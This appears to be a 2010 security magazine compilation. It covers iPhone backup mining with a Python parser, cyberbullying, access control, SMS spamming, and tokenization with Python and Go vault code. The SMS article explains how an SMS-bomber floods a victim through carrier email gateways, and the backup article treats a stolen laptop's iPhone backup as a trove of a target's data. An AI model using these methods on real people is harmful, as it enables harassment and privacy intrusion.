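    """iTunes names a backed-up file SHA-1("Domain-Path"), e.g. the SMS store
    HomeDomain-Library/SMS/sms.db becomes 3d0d7e5fb2ce288813306e4d4636395e047a3d28.
    Documented for iTunes backups; assumed to hold for the .mddata layout here."""
    return hashlib.sha1(f"{domain}-{path}".encode("utf-8")).hexdigest()


def index_backup(files):
    """files maps base name -> (mdinfo_bytes, mddata_bytes).  Returns one record
    per file with its real path and sniffed type: the identification step the
    article describes as trial and error."""
    records = []
    for name, (mdinfo, mddata) in sorted(files.items()):
        meta = parse_mdinfo(mdinfo)
        records.append({
            "file": name,
            "domain": meta["domain"],
            "path": meta["path"],
            "type": sniff(mddata),
            "name_matches_hash": name == backup_filename(meta["domain"], meta["path"]),
        })
    return records


def build_sample_backup():
    """Constructed two-file backup: the IMG_0103.JPG path from the article and
    the SMS database path; the payloads are fake headers, not real files."""
    entries = [
        ("MediaDomain", "Media/DCIM/100APPLE/IMG_0103.JPG", b"\xff\xd8\xff\xe1" + b"\x00" * 16),
        ("HomeDomain", "Library/SMS/sms.db", b"SQLite format 3\x00" + b"\x00" * 16),
    ]
    return {backup_filename(d, p): (make_sample_mdinfo(d, p), payload)
            for d, p, payload in entries}


if __name__ == "__main__":
    for rec in index_backup(build_sample_backup()):
        print(f"{rec['file']}  {rec['type']:<28} {rec['domain']}/{rec['path']}")
```

On a real backup, replace build_sample_backup() with a loop that reads each <hash>.mdinfo and <hash>.mddata pair from the backup directory; the name_matches_hash field then tells you immediately whether the SHA-1 naming assumption holds for that iTunes version.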

At the end of the day an unencrypted backup 
of an iPhone is a treasure chest just waiting to 
be opened and dug through. The amount of 
information that can be found out about a tar- 
get simply by digging through the various files 
with simple Unix/Linux tools is astonishing. 



While it can be argued that getting hold of a 
laptop with this sort of setup in place is a little 
difficult (nearly impossible some would say), 
you just have to look at the stats of lost lap- 
tops at airports to see that the possibility is 
there. 

The moral of this story? Encrypt. Everything. 
Always. 

It takes an insignificant amount of effort to be 
a little more secure and you will be thanking 
your lucky stars when your machine is stolen. 
Most of the time the machines are probably 
wiped and reinstalled for resale, but these 
days, you never know who is after what. 



Matt Erasmus is an info-sec professional, packet junkie and Mac addict from South Africa. 
The GRC Meeting 2010 aims to bring to participants the main challenges that managers involved in the areas of IT Governance, Risk & Compliance face, and to share the strategies, solutions and methods best suited to deal with them after the global economic crisis.
As many children wrap up another school year, I'm reminded of the fact that for most, the past few months have left them with fond and lasting memories of friends, achievements and milestones - memories that they will cherish in later years. The problem of cyber bullying, however, makes this assumption invalid for a growing number of students.



Today, this problem is far worse than when 
school children picked on kids during recess 
periods and inside the schoolyard, because 
the perpetrators of computer-generated taunts 
can now access their victims 24 hours a day, 
seven days a week. 

The numbers are staggering. The National Crime Prevention Council released these eye-opening statistics in 2007:

• More than 40 percent of all teenagers with 
Internet access have reported being bullied 
online. 

• A mere 10 percent of those kids who were bullied told their parents about the incident, and only 18 percent of the cases were reported to a local or national law enforcement agency.



• Fifty-eight percent of 4th through 8th graders 
reported having mean or cruel things said to 
them online. 53 percent said that they have 
said mean or hurtful things to others while on- 
line. 42 percent of those studied said they had 
been "bullied online", but almost 60 percent 
never told their parents about the incident. 

• Ten percent of 770 young people surveyed 
were made to feel "threatened, embarrassed 
or uncomfortable" by a photo taken of them 
using a cell-phone camera. 

While schools can't watch students around the 
clock, they can at least ensure that their net- 
works, just like their playgrounds, are safe for 
kids. Protection against these kinds of attacks 
is arguably more critical for educational institu- 
tions than ensuring personal data is not com- 
promised, because the negative impact of cy- 
ber bullying can have far greater implications. 
Take 15-year-old Phoebe P., for example. The Massachusetts teenager committed suicide last January, after having been the recipient of a continuous barrage of mean online messages and emails.

Action is most certainly required. So, here are 
some effective strategies educators should 
implement to counter cyber bullying before the 
beginning of the new school year. 

• Start using strong email/IM gateway filtering 
platforms. Internal school emails and IM chat 
platforms are the easiest way for bullies to ac- 
cess their victims. Thankfully, there are cost- 
effective, robust turnkey systems on the mar- 
ket that can plug into existing systems and set 
up a virtually impenetrable wall between the 
perpetrators and their targets. 



• Make sure everyone knows you're watching 
and on the job. Most criminal acts (cyber bul- 
lying included) are conducted in secrecy. 
Shedding light on the perpetrators' activities 
by telling them that they're being watched is a 
great tactic in this particular situation. 

• Call for backup. Schools and educators 
should not have to fight cyber bullies alone, 
but rather get help from their system integra- 
tors and product vendors. The best partners 
are the ones who have offerings that specifi- 
cally counter current and future attacks of this 
nature. 

This scourge must end, and teachers, princi- 
pals and parents are the ones who must do it. 
It's time they had the tools and experts at their 
disposal to make it happen. 



Max Huang is the founder and CEO of O2Security (www.o2security.com), a manufacturer of network security appliances and disaster recovery offerings. He can be reached at max.huang@o2security.com.
Tracks Eraser Pro (www.net-security.org/software.php?id=268)

Tracks Eraser Pro is a privacy cleaner that can clean up all Internet tracks and other activity trails 
on your computer. With only one click, Tracks Eraser Pro allows you to erase the browser cache, 
cookies (with option to keep certain ones), history, typed URLs, auto-complete memory as well as 
index.dat from your browser, and Windows temp folders, run history, search history, open/save 
history, recent documents and more. 



DSPAM (www.net-security.org/software.php?id=582)

DSPAM is an extremely scalable, open-source statistical anti-spam filter. While most commercial 
solutions only claim a mere 95% accuracy (1 error in 20), a majority of DSPAM users frequently 
see around 99.95% (1 error in 2000) and can sometimes reach peaks as high as 99.991% (2 er- 
rors in 22,786, as with one particular user). 



Samhain (www.net-security.org/software.php?id=125)

Samhain is an open source file integrity and host-based intrusion detection system. It can run as a daemon process and thus can remember file changes - contrary to a tool that runs from cron: if a file is modified you get only one report, while subsequent checks of that file ignore the modification as it has already been reported (unless the file is modified again).



Server Inspector (www.net-security.org/software.php?id=574)

Server Inspector is a professional monitoring tool. You can monitor Windows services, websites, 
applications, files, drives, hosts and databases. In case of an emergency Server Inspector can no- 
tify you via e-mail, SMS or a network message. 
One of the most valuable benefits of the Internet is its ability to foster high levels of information sharing and collaboration. Not only has the Internet enabled massive efficiency gains when it comes to managing complex supply chains, it is in and of itself a supply chain for the distribution of information. The ability to engage online has provided government agencies with a wealth of strategic opportunities, especially when it comes to leveraging employees, partners and contractors in ways that might not be feasible outside of cyberspace.



However, stringent security and compliance 
requirements require government agencies to 
maintain strong controls over how information 
and people are managed online - and be able 
to demonstrate that those controls are always 
in place. So how do IT departments manage 
the catch-22 of opening up their networks to 
strategic third parties without risk of exposing 
critical systems or data? 

From a technology perspective, the major shift 
that needs to occur is to design and imple- 
ment controls from a user-centric point of 
view. While this might not sound like a big 
deal, network security is by nature device- 
centric. Let's look at some real world scenar- 
ios where a user or an identity-based ap- 
proach to access control becomes a huge 
business enabler. 



Outsourcing: Outsourcing is one of the most 
mature use cases for third-party access con- 
trol. Managed security services, which are just 
a portion of the overall managed services 
market, was estimated by Forrester to be a $3 
billion industry in 2008, and provides a good 
example of why a company would want an 
outsider to have unfettered access to critical 
systems. Outsourcing the daily management 
of critical infrastructure can save companies a 
significant amount of time and money. 

But with the rewards of outsourcing come new 
risks, such as opening up the network to your 
outsourcing partner. This risk is amplified by 
the fact that users tend to be technically savvy 
and require access to critical systems. If they 
wanted to do harm they are well positioned to 
do so, and if they make a mistake it could 
have significant repercussions. 
Cloud computing: Cloud computing has been getting a lot of attention lately, but the reality is that many of the same rules that apply to MSSPs also apply in cloud scenarios. In cloud environments you might have a variety of administrators accessing the cloud infrastructure to manage and configure it, and cloud customers who require access to their data - in both cases there can be huge consequences if either set of users accesses anything but authorized systems and data. Third-party access control systems provide many of the controls that remove the security and compliance issues currently inhibiting mass adoption of cloud computing.

Cross-agency development/information 
sharing: In the federal arena, inter- and intra- 
agency information sharing - especially when 
it comes to application development - is an 
area of significant innovation. However, creat- 
ing an environment where individuals have 
varying security clearances and strict informa- 
tion assurance requirements can be a chal- 
lenge - especially if they need to move around 
the network, which is a common requirement 
in joint development scenarios. 

Managing supply chains: A sophisticated 
supply chain requires multiple parties to have 
access to multiple applications or systems. In 
some cases, a simple portal model will suffice. 
In other cases, if competitors are bidding for a 
specific job, or in the transfer of sensitive 
goods, supply chain tracking can only work if 
strong controls are in place that dictate who 
has access to what systems. 

Knowing that there are no silver bullets or 
one-size-fits-all solutions for security, here are 
some of the fundamental requirements for im- 
plementing the access controls required to 
enable the above scenarios: 

1) Policy-driven: At the start of any technology deployment, common sense dictates an audit of current access policies to see if they are aligned with the needs of the business. If they aren't, they need to be adjusted in a way that is flexible enough to account for future change. This should be part and parcel of any access control solution. If the policy engine is not native to the specific solution, it should be able to integrate and communicate with other systems where access policies may already reside.

2) Enforceable: Policies are useless without the ability to enforce them. While this might sound like a no-brainer, the reality is that the more secure a system is, the more complex it is to manage and use. While you don't want trusted outsiders to have free rein on the network, you do want them to have easy access to the systems they need in order to do their jobs. Access rights and privileges are dictated via policies, and enforced via controls.

3) Auditable: Access control solutions must 
provide robust reporting and auditing capabili- 
ties where information can be easily dissemi- 
nated to a diverse set of stakeholders with 
varying agendas. For example, a business 
lead might want a report that shows that no 
one went anywhere on the network they were 
not supposed to and that there are no compli- 
ance violations. An IT administrator might want 
much more granular audit trail that can be 
used for compliance, forensics, e-discovery, 
SLAs, etc. 

4) "Future-proof": Interoperability with legacy 
and future systems should be a given with any 
emerging technology. This is a fine line to 
walk. For example, many private and public 
sector agencies are embracing virtualization/ 
Cloud computing as a way to maximize re- 
sources while minimizing costs. That having 
been said, some of the world's most powerful 
networks are still powered by mainframe sys- 
tems that will need to talk to those virtualized 
environments. Making sure access control 
systems are both backward and forward com- 
patible will lower the TCO and raise the ROI of 
ANY technology investment. While this is just 
a baseline, it's a good start - any solution 
without these attributes will not provide the 
security and compliance controls needed for 
secure collaboration. 



Dave Olander is the SVP Engineering at Xceedium (www.xceedium.com), where he oversees the evolution of 
the Xceedium GateKeeper. 
According to recent news, users use their mobile phones for many tasks, but relatively few phone calls. Instead of calling, people prefer to send text messages and use their mobile phone for browsing, listening to music and emailing. Three-quarters of the teen population and 90 percent of households in the United States have a mobile phone. However, according to industry data, the amount of voice minutes has stagnated, while the number of text messages has increased considerably.



It's no wonder, then, that the cracker commu- 
nity sees the SMS mode of communication as 
an opportunity to exploit and a way of reaping 
maximum benefits. In the last two years, there 
has been a substantial rise in attacks con- 
ducted via text messages. The bad guys are 
working hard to find a way to exploit mobile 
devices by taking advantage of a vulnerability 
or a loophole in texting. 

But, let us revisit some of the popular exploits 
used recently. 

In the spring of 2009, smartphone users were taken aback by the sophistication of an SMS worm known as YXES, which targeted Symbian devices. The worm delivered a text message with a link to a website that, if followed, would download a malicious payload onto the victim's device. Once the device was infected, the payload attempted to send SMS messages to the contacts stored on the victim's phone. The worm also stole the victim's device information and uploaded it to a server.

In the summer of 2009, researchers gave a live demonstration of an exploit at the Black Hat conference that allowed them to take complete control of a victim's iPhone by sending a specially crafted SMS message. Later, in the fall of 2009, RIM issued an advisory about a certificate-handling flaw that could allow an attacker to trick users into visiting malicious websites via SMS messages.

A denial of service attack dubbed "Curse of Silence", which limits the number of SMS messages a mobile device can receive, was disclosed and demonstrated at the 25th Chaos Communication Congress (25C3) in 2008; it too involved sending a specially crafted SMS message to the victim's device. According to security researchers at Pennsylvania State University, attackers could also cause a denial of service by flooding the mobile network with SMS traffic and, if successful, cripple it.

Last, but not least, is the ubiquitous threat to which every smartphone platform is vulnerable: SMS spamming.

Neither smartphones nor service providers offer a feature that regulates the flow of incoming text messages and verifies their contents on the user's device. Thus, smartphone users are vulnerable to attacks via SMS and to spam text messages sent by companies that want to promote their products. These unsolicited text messages are not only irritating; they can also pose a security risk to the users.

Considering the increase in SMS-based attacks on smartphones, it has become essential to have policies in place to verify and regulate incoming text messages. This article aims to show that SMS spamming can be executed easily while the spammer maintains complete anonymity. To clarify this point, it discusses SMS spamming techniques on Windows and on Unix-like platforms.

SMS spamming via Windows

On Windows, the spammer can use an application like "SMS bomber", which can easily be written in VB (Visual Basic) or Java. The application has a simple front-end that asks for the victim's phone number, service provider, message and the number of times the SMS is to be sent (as shown below).

Once the spammer clicks the "BOMB" button, the application composes an email message similar to the one shown below and emails it to the SMS gateway of the victim's service provider. The email addresses of the various providers' SMS gateways are publicly available on numerous sites and public forums, so the developer can simply build this information into the application.

SMS spamming via Linux

The previous section discussed an application that sends a large number of spam text messages to the victim. There is an even easier way of doing this: the spammer can use a script.

The script I tested sends two hundred and fifty text messages to the victim. This number can be changed to hundreds or thousands and even higher, to the point where it can clog network resources.

I tested the script on a T-Mobile and a Verizon number; the results, as received on a Windows HTC device and a BlackBerry, are shown on the following page.



www.insecuremag.com

[Screenshots: the test flood as received on the Windows HTC device and on the BlackBerry, May 2010, 12:32 PM. Each entry shows the same message, "(WARNING!!!) Your device has been hacked. Immediately click on the following link:" followed by a tinyurl.com link, repeated many times within the same minute and attributed to an email-gateway sender rather than a phone number.]



Anti-spam on the smartphone 

Anti-spam technology for SMS spam differs 
from anti-spam technology for email spam. 
Due to the limitation in the control of third 
party vendors over the features supported by 
mobile platforms, the endpoint anti-spam 
security is the most feasible solution. 

The following options should be useful:

• Enable SMS/Call blocking - Blocks SMS messages and calls from specific numbers.

• Enable Shortcode Blocking - Blocks SMS messages from numbers that have five or fewer digits.

• Prompt to Block Ignored Callers - Generates a prompt before ignoring an SMS message or call from a blocked number.

SMS messages sent over the Internet using software applications like SMS Bomber do not have an originating phone number. When the service provider delivers such a message to the victim, it appears to come from a short (typically four-digit) number.

If there is anti-spam software on the user's device and the "Enable Shortcode Blocking" setting is on, it blocks SMS messages coming from numbers with five or fewer digits and logs the result in the spam log. Note that this is a blunt control: it also blocks legitimate short-code traffic such as carrier notifications and one-time passcodes, so the prompt option matters.
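The three controls above, plus a flood limiter for the bombing case described earlier, as an added Python example (not SMobile's product or the author's code): a small endpoint-side filter that classifies each incoming message as deliver, prompt or drop and writes a spam log. The inbox is constructed, modelled on the screenshots (one bogus "your device has been hacked" text repeated from a four-digit gateway sender, plus two ordinary messages); the sender IDs, the flood threshold of five messages per sender per minute and the treatment of "+"-prefixed numbers as never being shortcodes are my assumptions.

```python
import re
from collections import defaultdict, deque

# Constructed inbox: (unix seconds, sender, text).  The flood text is modelled
# on the screenshots above; the link target, senders and timings are invented.
FLOOD_TEXT = ("(WARNING!!!) Your device has been hacked. Immediately click on "
              "the following link: http://example.invalid/x")
SAMPLE_INBOX = (
    [(1000 + i, "1010", FLOOD_TEXT) for i in range(12)]          # 12 copies in 12 s
    + [(1005, "+27110000001", "Running late, see you at 7"),
       (1020, "+27110000002", "Call me when you land")]
)


class SmsFilter:
    """Endpoint SMS filter: number blocklist, shortcode blocking, optional
    prompt before dropping, and a per-sender flood limit (thresholds assumed)."""

    def __init__(self, block_shortcodes=True, blocked=(), prompt_before_drop=True,
                 max_per_window=5, window_s=60):
        self.block_shortcodes = block_shortcodes
        self.blocked = set(blocked)
        self.prompt_before_drop = prompt_before_drop
        self.max_per_window = max_per_window
        self.window_s = window_s
        self._recent = defaultdict(deque)   # sender -> timestamps inside the window
        self.spam_log = []                  # (ts, sender, reason, text prefix)

    @staticmethod
    def is_shortcode(sender):
        """Five or fewer digits and no international '+' prefix (assumption)."""
        digits = re.sub(r"\D", "", sender)
        return 0 < len(digits) <= 5 and not sender.startswith("+")

    def _flooding(self, sender, ts):
        """Sliding window: more than max_per_window messages in window_s seconds."""
        window = self._recent[sender]
        window.append(ts)
        while window and ts - window[0] > self.window_s:
            window.popleft()
        return len(window) > self.max_per_window

    def classify(self, ts, sender, text):
        """Return 'deliver', 'prompt' (ask the user) or 'drop' (silently)."""
        reason = None
        if sender in self.blocked:
            reason = "blocked number"
        elif self.block_shortcodes and self.is_shortcode(sender):
            reason = "shortcode sender"
        elif self._flooding(sender, ts):
            reason = "flood"
        if reason is None:
            return "deliver"
        self.spam_log.append((ts, sender, reason, text[:40]))
        return "prompt" if self.prompt_before_drop else "drop"

    def run(self, inbox):
        """Process messages in arrival order; return the ones delivered."""
        delivered = []
        for ts, sender, text in sorted(inbox):
            if self.classify(ts, sender, text) == "deliver":
                delivered.append((ts, sender, text))
        return delivered


if __name__ == "__main__":
    f = SmsFilter()
    for msg in f.run(SAMPLE_INBOX):
        print("delivered:", msg)
    for entry in f.spam_log:
        print("spam log:", entry)
```

With shortcode blocking on, every copy of the flood is stopped before the flood limiter is even consulted; with it off, the limiter still lets only the first five through, which is the behaviour a 250-message bomb actually needs defending against.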



Mayank Aggarwal is a security researcher at Global Threat Center, SMobile Systems. His research focuses on 
exploiting security loopholes in smartphones, malware analysis and reverse engineering. He is a certified ethi- 
cal hacker (CEH) and a Sun certified Java programmer (SCJP). (maggarwal@smobilesystems.com, twitter: 
unsecuremobile). 
A new scalable approach to data tokenization

by Ulf Mattsson

This is a new approach to data tokenization - one that eliminates challenges associated with standard centralized tokenization.



The usual way of generating tokens is prone 
to issues that impact the availability and per- 
formance of the data, particularly when it 
comes to high volume operations. From a se- 
curity standpoint, it is critical to address the 
issue of collisions caused when tokenization 
solutions assign the same token to two 
separate pieces of data. 

This next generation tokenization solution ad- 
dresses all of these issues. System perform- 
ance, availability and scaling are enhanced; 
numeric and alpha tokens are generated to 
protect a wide range of high-risk data; key 
management is greatly simplified; and colli- 
sions are eliminated. This new approach has 
the potential to change where tokenization 
can be used. 

Different ways to render data unreadable 

There are three different ways to render data 
unreadable: 

1) Two-way cryptography with associated key 
management processes 



2) One-way transformations including trunca- 
tion and one-way cryptographic hash 
functions 

3) Index tokens and pads. 

Two-way encryption of sensitive data is one of 
the most effective means of preventing infor- 
mation disclosure and, consequently, fraud. 
Cryptographic technology is mature and well- 
proven. The choice of encryption scheme and 
topology is critical in deploying a secure, 
effective and reasonable control. 

Hash algorithms are one-way functions that turn a message into a fixed-length fingerprint, typically a few dozen bytes long. Truncation discards part of the input field. These approaches are used to reduce the cost of securing data fields when the data is not needed to do business and there will never be a need to get the original data back.

Tokenization consists of substituting sensitive 
data with replacement values that retain all 
the essential characteristics without compro- 
mising the security of the data. 
A token can be thought of as a claim check that an authorized user or system can use to obtain sensitive data such as a credit card number. When implementing tokenization, all credit card numbers usually stored in business applications and databases are removed and placed in a highly secure, centralized encryption management server that can be protected and monitored by using robust encryption technology.
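The claim-check model described above, as an added example that is not part of the original article or any vendor's product: a minimal in-memory token server in Python that hands out random, format-preserving numeric tokens, refuses to issue a token that collides with an existing token or with a real card number held in the vault (the collision problem the introduction calls out), returns the same token for the same card number, and surrenders the card number only to an authorized caller. The HMAC lookup key, the retry limit, the choice to preserve the last four digits and the card numbers used for testing are all my assumptions or constructed values.

```python
import hashlib
import hmac
import secrets


class TokenVault:
    """Minimal central token server: maps a card number (PAN) to a random,
    format-preserving token and back.  In-memory only; the PAN-to-token index
    is keyed by an HMAC so that index never holds plaintext PANs as keys."""

    MAX_TRIES = 8  # assumption: fail loudly rather than loop on repeated collisions

    def __init__(self, lookup_key, rng=None):
        self._lookup_key = lookup_key
        self._rng = rng if rng is not None else secrets.randbelow
        self._by_token = {}   # token -> PAN  (the vault proper)
        self._by_pan = {}     # HMAC(PAN) -> token, so tokenize() is idempotent
        self._pans = set()    # every PAN held, for the token-equals-a-PAN check

    def _pan_index(self, pan):
        return hmac.new(self._lookup_key, pan.encode(), hashlib.sha256).hexdigest()

    def _candidate(self, pan):
        """Random digits of the same length; keep the last four so receipts and
        customer-service lookups keep working (assumption: that is acceptable)."""
        middle = "".join(str(self._rng(10)) for _ in range(len(pan) - 4))
        return middle + pan[-4:]

    def tokenize(self, pan):
        if not (pan.isdigit() and 12 <= len(pan) <= 19):
            raise ValueError("PAN must be 12-19 digits")
        idx = self._pan_index(pan)
        if idx in self._by_pan:            # same PAN always gets the same token
            return self._by_pan[idx]
        for _ in range(self.MAX_TRIES):
            tok = self._candidate(pan)
            # Collision checks: never issue a token already bound to another PAN,
            # and never issue a token that equals a real PAN (this one or any held).
            if tok in self._by_token or tok in self._pans or tok == pan:
                continue
            self._by_token[tok] = pan
            self._by_pan[idx] = tok
            self._pans.add(pan)
            return tok
        raise RuntimeError("could not find a collision-free token")

    def detokenize(self, token, caller_authorized):
        """The claim check: only an authorized caller gets the PAN back."""
        if not caller_authorized:
            raise PermissionError("detokenization refused")
        return self._by_token[token]


if __name__ == "__main__":
    vault = TokenVault(lookup_key=b"demo-lookup-key")          # constructed key
    for pan in ("4111111111111111", "5500000000000004"):       # constructed PANs
        tok = vault.tokenize(pan)
        print(pan, "->", tok, "->", vault.detokenize(tok, caller_authorized=True))
```

The rng parameter exists so the collision path can be exercised deterministically; a production vault would also encrypt the stored PANs at rest and persist the mapping, which is the key-management point the myths section below returns to.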

A central token solution can:

• Minimize the risk of exposing data with intrinsic value
• Reduce the number of potential attack targets
• Reduce the cost of PCI assessment.

All industries can benefit from centralization 
and tokenization of data. Tokenization is about 
understanding how to design systems and 
processes to minimize the risk of exposing 
data elements with intrinsic (or market) value. 



An enterprise tokenization strategy reduces the overall risk to the enterprise by limiting the number of people who have access to confidential data. When tokenization is applied strategically to enterprise applications, confidential data management costs are reduced and the risk of a security breach is reduced with them. Security is immediately strengthened by reducing the number of potential targets for would-be attackers. Studies have shown annual audits average $225K per year for the world's largest credit card acceptors.

Any business that collects, processes or stores payment card data is likely to gain measurable benefits from central tokenization. Most of the tokenization packages available today are focused on the point of sale (POS): card data is removed from the process at the earliest point and replaced with a token number that has no value to an attacker. These approaches are offered by third-party gateway vendors and other service providers.






Common myths about tokenization

• Myth: Data is gone forever if you lose access to the encryption keys
• Myth: Do not encrypt data that will be tokenized
• Myth: Tokens transparently solve everything.

There is a lot of erroneous information about tokenization out there. For example, that tokenization is better than encryption because "if you lose access to the encryption keys the data is gone forever." This issue exists with both tokenization and encryption, and in both cases it is managed through proper key management and a secure key recovery process. Both a key server and a token server can crash, and therefore both must have a backup. The token server usually encrypts the data stored in it, so the token server can lose its key as well. A solid key management solution and process is a critical part of any enterprise data protection plan.
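
As an added illustration (not Protegrity's code or any product's API), the following Go program sketches a central token server of the kind the article describes: tokens are random digits with no value to an attacker; each PAN is held only as AES-GCM ciphertext under a key the server must be able to back up and recover; the same PAN always maps to the same token through a keyed HMAC index, so the plaintext never serves as a lookup key; a minted token that collides with one already issued is rejected and regenerated; and detokenization is refused to any role the policy does not list. The role names, the 13-19 digit PAN rule, the keep-last-four token shape and the test card number are assumptions made for the example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
	"math/big"
	"strings"
)

// Vault is a minimal central token server: each PAN is stored only as AES-256-GCM
// ciphertext, indexed by an HMAC under a second key (so one PAN always maps to one
// token without the plaintext ever being a lookup key), and released only by role.
type Vault struct {
	aead    cipher.AEAD         // protects PANs at rest
	idxKey  []byte              // HMAC key for the PAN -> token index
	byToken map[string][]byte   // token -> nonce || ciphertext
	byPAN   map[[32]byte]string // HMAC(PAN) -> token
	allowed map[string]bool     // roles permitted to detokenize (assumed policy)
}

// NewVault draws fresh keys; a real deployment loads them from a key manager with backup.
func NewVault(allowedRoles ...string) *Vault {
	keys := make([]byte, 64)
	rand.Read(keys)                      // a crypto/rand failure is fatal anyway
	block, _ := aes.NewCipher(keys[:32]) // cannot fail for a 32-byte key
	aead, _ := cipher.NewGCM(block)      // cannot fail for an AES block
	v := &Vault{aead: aead, idxKey: keys[32:], byToken: map[string][]byte{},
		byPAN: map[[32]byte]string{}, allowed: map[string]bool{}}
	for _, r := range allowedRoles {
		v.allowed[r] = true
	}
	return v
}

// randomToken keeps the PAN's length and last four digits and replaces the rest with
// random digits (128 random bits reduced mod 10^n, so the bias is negligible).
func randomToken(pan string) string {
	n := len(pan) - 4
	buf := make([]byte, 16)
	rand.Read(buf)
	limit := new(big.Int).Exp(big.NewInt(10), big.NewInt(int64(n)), nil)
	r := new(big.Int).Mod(new(big.Int).SetBytes(buf), limit)
	return fmt.Sprintf("%0*d%s", n, r.Int64(), pan[n:])
}

// Tokenize returns the token already issued for a PAN or mints a new one, retrying on collision.
func (v *Vault) Tokenize(pan string) (string, error) {
	if len(pan) < 13 || len(pan) > 19 || strings.Trim(pan, "0123456789") != "" {
		return "", errors.New("PAN must be 13-19 digits")
	}
	mac := hmac.New(sha256.New, v.idxKey)
	mac.Write([]byte(pan))
	var idx [32]byte
	copy(idx[:], mac.Sum(nil))
	if tok, ok := v.byPAN[idx]; ok {
		return tok, nil
	}
	for attempt := 0; attempt < 100; attempt++ {
		tok := randomToken(pan)
		if _, taken := v.byToken[tok]; taken {
			continue // collision: two PANs must never share a token
		}
		nonce := make([]byte, v.aead.NonceSize())
		rand.Read(nonce)
		v.byToken[tok] = v.aead.Seal(nonce, nonce, []byte(pan), []byte(tok)) // token is the GCM AD
		v.byPAN[idx] = tok
		return tok, nil
	}
	return "", errors.New("could not mint a collision-free token")
}

// Detokenize is the only path back to the PAN and is gated on the caller's role.
func (v *Vault) Detokenize(tok, role string) (string, error) {
	if !v.allowed[role] {
		return "", fmt.Errorf("role %q may not detokenize", role)
	}
	blob, ok := v.byToken[tok]
	if !ok {
		return "", errors.New("unknown token")
	}
	ns := v.aead.NonceSize()
	pan, err := v.aead.Open(nil, blob[:ns], blob[ns:], []byte(tok))
	if err != nil {
		return "", err
	}
	return string(pan), nil
}

func main() {
	v := NewVault("settlement")
	tok, _ := v.Tokenize("4111111111111111") // constructed test PAN, not a real card
	fmt.Println(tok)
}
```

If the 64 key bytes drawn in NewVault are lost, every ciphertext in byToken becomes unreadable. That is the grain of truth in the myth: the data is not gone because it was tokenized, it is gone because the key was not managed.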

Some articles encourage businesses not to encrypt data that they plan to tokenize. They claim that encrypted data takes more tokenization space than clear text data, and that many forms of sensitive data contain more characters than a 16-digit credit card number, causing storage and manageability problems. This is untrue if you are using Format-Controlling Encryption (FCE), which yields ciphertext of the same length and character set as the input, so a 16-digit field stays a 16-digit field. Telling companies not to encrypt because of an issue that is easily addressed denies them a critical layer of security that adds to the defense of sensitive data.

Tokenization can often be a complicated affair in larger retail environments or enterprises because the data resides in many places, different applications, and service providers. Applications which have to process the real value of the data would need to be reworked to support tokenization. The cost of changing the application code can be hard to justify when weighed against the level of risk reduction. Regardless of industry, if the data resides in many different places, switching to tokenization will probably require some programming changes, and a legacy application may not be rebuildable at all.
Tokenizing and the data lifecycle

The combined approaches of tokenization and encryption can be used to protect the whole data lifecycle in an enterprise. The combination also provides high quality, production level data for test environments, virtualized servers and outsourced environments.

In the development lifecycle there is a need to perform high quality test scenarios on production quality test data by reversing the data hiding process. Key data fields that can be used to identify an individual or corporation need to be cleansed to depersonalize the information. In the early stages of implementation, cleansed data needs to be easily restored (for downstream systems and feeding systems). This requires two-way processing. The restoration process should be limited to situations for which there is no alternative to using production data.

Authorization to use this process must be limited and controlled. In some situations, business rules must be maintained during any cleansing operation (addresses for processing, dates of birth for age processing, names for gender distinction). There should also be the ability to set parameters, or to select or identify fields to be scrambled, based on a combination of business rules.

Should a company build their own tokenizing solution?

Developing all the capabilities to build an in-house solution can present significant challenges. In order to implement tokenization effectively, all applications that currently house payment data must be integrated with the centralized tokenization server. Developing these interfaces would require a great deal of expertise to ensure performance and availability. Writing an application that is capable of issuing and managing tokens in heterogeneous environments and supporting multiple field length requirements can be complex and challenging.

Furthermore, ongoing support of this application could be time consuming and difficult. Allocating a dedicated resource to this large undertaking and covering for responsibilities could present logistical, tactical, and budgetary challenges.

For many organizations, locating the in-house expertise to develop such complex capabilities as key management, token management, policy controls, and heterogeneous application integration can be very difficult. Writing code that interfaces with multiple applications, while minimizing the performance impact on those applications, presents an array of challenges. The overhead of maintaining and enhancing a security product of this complexity can ultimately represent a huge resource investment and a distraction from an organization's core focus and expertise.

Security administrators looking to gain the benefits of centralization and tokenization without having to develop and support their own tokenization server should look at vendors that offer off-the-shelf solutions.

Reasons to keep the token server in-house

• Liability and risk

• Many applications use or store data

• Multi-channel commerce

• Security of outsourcing

• Recurring cost of tokenization when data volume is increasing, since outsourcing may charge based on transaction volume

• Issues of transparency, availability, performance and scalability.

Typically, companies do not want to outsource secure handling of data since they cannot outsource risk and liability. Organizations are not willing to move the risk from their own environment into a potentially less secure hosted environment. Furthermore, enterprises need to maintain certain information about transactions at the point of sale (POS), as well as at higher levels. In most retail systems, there are multiple applications that use or store card data, from the POS to the data warehouses, as well as sales audit, loss prevention, and finance. At the same time, the system needs to be adequately protected from data thieves.

Merchants who gather card data via Web commerce, call centers and other channels should ensure that the product or service they use can tokenize data through all channels.
Not all offerings in the market work well or cost-effectively in a multi-channel environment, particularly if the token service is outsourced. Merchants need to ensure that their requirements reflect current and near-future channel needs. Another concern is that tokenization is newer and less proven than mature encryption solutions, and can therefore pose an additional risk.

A risk management analysis will reveal whether the cost of deploying in-house tokenization is worth the benefits. An outsourcing environment must be carefully reviewed from a security point of view and provide a reliable service to each globally connected endpoint. Many merchants continue to object to having anyone keep their card data other than themselves. Often, these are leading merchants that have made significant investments in data security and simply do not believe that any other company has more motivation (or better technology) than they do to protect their data.

Along with separation of duties and auditing, a tokenization solution requires a solid encryption and key management system to protect the information in the centralized token server. By combining encryption with tokenization, organizations can have security, efficiency, and cost savings for application areas within an enterprise.






Holistic solutions can support end-to-end field encryption, which is an important part of the next generation protection of the sensitive data flow. In some data flows, the best combination is end-to-end field encryption utilizing format controlling encryption from the point of acquisition into the central systems. At that point, the data field is converted to a token for permanent use within the central systems. A mature solution should provide this integration between the encryption and tokenization processes.

Security is addressed by running the tokenization solution in-house on a high security network segment isolated from all other data and applications. If a segmented approach is used, every tokenization and detokenization request must be authorized before it reaches this highly sensitive server. Access to the token server must be based on authentication, authorization, an encrypted channel, and monitoring and/or blocking of suspicious transaction volumes and request patterns.
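
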